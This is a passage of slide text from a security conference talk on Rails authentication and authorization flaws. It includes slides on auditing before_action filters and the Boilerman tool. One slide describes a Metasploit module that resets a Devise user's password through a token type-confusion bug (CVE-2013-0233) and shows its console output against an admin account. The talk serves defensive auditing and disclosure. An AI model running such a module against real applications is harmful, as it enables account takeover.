  • 32. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Metasploit module rails_devise_pass_reset.rb Clears any outstanding tokens Generates a token for a user of your choosing Resets password to token of your choosing Legitimate user *WILL* get emails 32 msf  auxiliary(rails_devise_pass_reset)  >  exploit   [*]  Clearing  existing  tokens...   [*]  Generating  reset  token  for  admin@example.com...   [+]  Reset  token  generated  successfully   [*]  Resetting  password  to  "w00tw00t"...   [+]  Password  reset  worked  successfully   [*]  Auxiliary  module  execution  completed
  • 33. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Password Reset Type Confusion Patched in Devise >= v2.2.3, v2.1.3, v2.0.5 and v1.5.4 CVE-2013-0233 33 Fixed in Rails = 3.2.12 https://github.com/rails/rails/pull/9208 >= 4.2.0 https://github.com/rails/rails/pull/16069 Reverted in Rails >= 3.2.13 https://github.com/rails/rails/issues/9292 Core vulnerability effects more than just Devise! User.where(“token=?”, params[token]) Thanks to @joernchen of Phenoelit
  • 34. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Authorization What can they do? Often tied to the concept of roles 34 Vertical Authorization Site Admin (Full Access) Organization Admin (Full Access to specific Org) “Regular User” (Limited Read Access + Local Write Access) Unauthenticated (No Access) Horizontal Authorization Org1 vs Org2 Data Within an Org, User1 vs User2 Data
  • 35. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Authorization - Rails 35 Vertical Authorization before_actions Horizontal Authorization Associations
  • 36. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Controller Routing Given a route: get '/posts', to: 'posts#index' 36 Method path controller # action
  • 37. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Controller Hierarchy 37
  • 38. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train How they work 3 types of callbacks - :before,  :around,  :after - Authorization tends to only care about before_actions 38 -­‐  before_action  :authorize_user,  only:  [:action1,  :action2,  …]   -­‐  before_action  :authorize_user,  except:  [:action1,  :action2,  …] -­‐  before_action  :authorize_user,  if:  method_call   -­‐  before_action  :authorize_user,  unless:  method_call -­‐  skip_before_action  :authorize_user,  only:  [:action1,  :action2,  …]   -­‐  skip_before_action  :authorize_user,  except:  [:action1,  :action2,  …] -­‐  before_action  :authorize_user,  Proc.new  {|controller|  #AUTHZ  Logic…  } http://api.rubyonrails.org/classes/ActiveSupport/Callbacks.html Different flavors
  • 39. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Authorization Gems Pundit - Enforced through the use of Policy classes  @post  =  Post.find(params[:id])    authorize  @post   - https://github.com/elabs/pundit CanCan(Can) - Enforced through the use of an Ability class - https://github.com/CanCanCommunity/cancancan 39
  • 40. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train CanCanCan Basics 40
  • 41. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Be On The Lookout For… find_by methods called directly on the model 41 GOOD CAUTION
  • 42. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Be On The Lookout For… before_action  …  only:  [:action1,  :action2] 42 CAUTION GOOD
  • 43. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Be On The Lookout For… Lightweight Controllers 43 GOOD CAUTION
  • 44. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Be On The Lookout For… Authorization Logic in Views 44 Ensure the application is also verifying permissions in controller action CAUTION
  • 45. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Be On The Lookout For… Skipping of filters 45 Skips the :authorize_admin filter for every action can be an artifact left over from testing/development
  • 46. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Rails Scaffolding 46
  • 47. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Be On The Lookout For… /app/views/bank_accts/show.json.jbuilder: json.extract  @bank_acct,  :id,  :acct_number,  :acct_balance,  :acct_holder_name,  … 47 http://rubyjunky.com/rails-scaffold-dangerous-defaults.html?utm_source=rubyweekly&utm_medium=email Possible unwanted attributes added to view or strong_parameters Generator/Scaffold artifacts
  • 48. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train New Tool: Boilerman Before Boilerman Audit every Controller manually Track inheritance / overrides Mind the gaps 48 https://github.com/tomekr/boilerman With Boilerman Dynamically resolve callbacks See all filters for a given Controller#Action Filter the list dynamically In browser or Rails Console
  • 49. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train New Tool: Boilerman Dynamic analysis tool Plugs into an existing Rails application Rails console access needed As a minimum requirement Mounted as a Rails engine Accessed at /boilerman   or through Rails Console 49 https://github.com/tomekr/boilerman
  • 50. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Boilerman Demo Praise be to the almighty demo gods. 50
  • 51. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Boilerman Install: gem  install  boilerman   Takeaways Rails console can be a very powerful tool Future Ideas D3 visualizations matrix of Controller#Action & Filter pairs Source querying via pry’s source functionality Useful for auditing Pundit based authorization schemes 51
  • 52. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Questions? 52 Tomek Rabczak @sigdroid Jeff Jarmoc @jjarmoc